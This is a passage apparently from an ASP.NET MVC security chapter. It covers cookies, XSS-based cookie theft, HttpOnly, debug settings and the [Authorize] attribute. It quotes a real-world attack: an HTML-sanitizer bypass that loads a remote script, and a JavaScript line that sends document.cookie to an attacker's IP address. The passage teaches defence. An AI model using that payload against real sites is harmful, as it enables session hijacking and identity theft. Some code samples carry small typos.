  • Persistent cookies are stored in actual text files on your computer's hard drive and are transmitted the same way.

The main difference is that session cookies are "forgotten" when your session ends — persistent cookies are not, and a site will "remember" you the next time you come along.
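In ASP.NET code, the only real difference is whether you give the cookie an explicit expiration date; a quick sketch (the cookie name is made up):

// Session cookie: lives in browser memory and disappears when the browser closes
Response.Cookies["prefs"].Value = "compactView";

// Persistent cookie: the explicit expiration causes the browser to write it to disk
Response.Cookies["prefs"].Expires = DateTime.Now.AddDays(30);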

If you could manage to steal someone's authentication cookie for a web site, you could effectively assume their identity and carry out all the actions that they are capable of. This type of exploit is actually very easy — but it relies on XSS vulnerability. The attacker must be able to inject a bit of script onto the target site in order to steal the cookie.

Jeff Atwood of CodingHorror.com wrote about this issue recently as StackOverflow.com was going through beta:

"Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges."

How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page:

<img src=" "http://www.a.com/a.jpg<script type=text/javascriptsrc=" http://1.2.3.4:81/xss.js">" /><<imgsrc=" "http://www.a.com/a.jpg</script>"

StackOverflow.com allows a certain amount of HTML in the comments — something that is incredibly tantalizing to an XSS hacker. The example that Jeff offered on his blog is a perfect illustration of how an attacker might inject a bit of script into an innocent-appearing ability such as adding a screen shot image.

Jeff used a "whitelist" type of XSS prevention — something he wrote on his own (his "friend" in the post is a Tyler Durden—esque reference to himself). The attacker, in this case, exploited a hole in Jeff's homegrown HTML sanitizer:

"Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. Here's what that JavaScript looks like:

window.location=" http://1.2.3.4:81/r.php?u="+document.links[1].text+"&l="+document.links[1]+"&c="+document.cookie;

That's right — whoever loads this script-injected user profile page has just unwittingly transmitted their browser cookies to an evil remote server!"

In short order, the attacker managed to steal the cookies of the StackOverflow.com users, and eventually Jeff's as well. This allowed the attacker to log in and assume Jeff's identity on the site (which was still in beta) and effectively do whatever he felt like doing. A very clever hack, indeed.

 
 

Preventing Cookie Theft with HttpOnly

The StackOverflow.com attack was facilitated by two things:

  • XSS vulnerability: Jeff insisted on writing his own anti-XSS code. Generally, this is not a good idea, and you should rely on things like BB Code or other ways of allowing your users to format their input. In this case, Jeff opened an XSS hole.

  • Cookie vulnerability: The StackOverflow.com cookies were not set to disallow changes from the client's browser.

You can stop script access to cookies by adding a simple flag: HttpOnly. You can set it programmatically when you write the cookie, like so:

Response.Cookies["MyCookie"].Value=" Remembering you…";Response.Cookies["MyCookie].HttpOnly=true;

Setting this flag simply tells the browser to keep the cookie away from client-side script — only the server can read or change it. This is fairly straightforward, and it will stop most XSS-based cookie theft, believe it or not.
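If you'd rather not set the flag cookie by cookie, ASP.NET also lets you apply it to every cookie the application writes via web.config; a minimal sketch:

<system.web>
  <httpCookies httpOnlyCookies="true" />
</system.web>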

 

Keeping Your Pants Up: Proper Error Reporting and the Stack Trace

Something that happens quite often is that sites go into production with the debug="true" attribute set in the web.config. This isn't specific to ASP.NET MVC, but it's worth bringing up in the security chapter because it happens all too often.

This setting is found in the web.config and comes along with a nice warning:

<system.web>
  <!--
    Set compilation debug="true" to insert debugging
    symbols into the compiled page. Because this
    affects performance, set this value to true only
    during development.
  -->
  <compilation debug="true">

Hackers can exploit this setting by forcing your site to fail — perhaps sending in bad information to a Controller using a malformed URL or tweaking the query string to send in a string when an integer is required.

When this setting is left on (debug="true") and an exception occurs, the ASP.NET runtime will show a "friendly" error message, which will also show the source code where the error happened. If someone was so inclined, they could steal a lot of your source and find (potentially) vulnerabilities that they could exploit in order to steal data or shut your application down.

This section is pretty short and serves only as a reminder to code defensively and turn that flag off!
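For reference, a hedged sketch of the production-safe counterpart (the defaultRedirect path is just an example):

<system.web>
  <compilation debug="false" />
  <customErrors mode="RemoteOnly" defaultRedirect="~/Error" />
</system.web>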

 

Securing Your Controllers, Not Your Routes

With ASP.NET Web Forms, you were able to secure a directory on your site simply by locking it down in the web.config:

<location path=" Admin" allowOverride=" false"> <system.web>   <authorization>     <allow roles=" Administrator" />     <deny users="?" />   </authorization> </system.web></location>

This works well on file-based web applications, but ASP.NET MVC is not file-based. As alluded to previously in Chapter 2, ASP.NET MVC is something of a remote procedure call system. In other words each URL is a route, and each route maps to an Action on a Controller.

You can still use the system above to lock down a route, but invariably it will backfire on you as your routes grow with your application.

Using [Authorize] to Lock Down Your Action or Controller

The simplest way to demand authentication for a given Action or Controller is to use the [Authorize] attribute. This tells ASP.NET MVC to use the authentication scheme set up in the web.config (FormsAuth, WindowsAuth, etc.) to verify who the user is and what they can do.

If all you want to do is to make sure that the user is authenticated, you can attribute your Controller or Action with [Authorize]:

[Authorize]
public class TopSecretController : Controller

Adding this to your Controller will redirect unauthenticated users to the login page with a ReturnUrl parameter (which uses Routing to figure out the route to the Action the user was trying to access) or will let them through as long as they are authenticated.
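For reference, the authentication scheme it leans on is whatever you've wired up in web.config; the default ASP.NET MVC project template configures Forms Authentication roughly like this:

<authentication mode="Forms">
  <forms loginUrl="~/Account/LogOn" timeout="2880" />
</authentication>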

If you want to restrict access by roles, you can do that too:

[Authorize(Roles = "Level3Clearance,Level4Clearance")]
public class TopSecretController : Controller

and you can also authorize by users:

[Authorize(Users = "NinjaBob,Superman")]
public class TopSecretController : Controller

It's worth mentioning once again that you can use the Authorize attribute on Controllers or Actions.
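A quick sketch of mixing the two levels on a single (hypothetical) controller:

public class ReportsController : Controller
{
    // Open to everyone
    public ActionResult Index()
    {
        return View();
    }

    // Only authenticated users in the Administrator role get here
    [Authorize(Roles = "Administrator")]
    public ActionResult Delete(int id)
    {
        // ... delete the report, then bounce back to the list
        return RedirectToAction("Index");
    }
}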

 
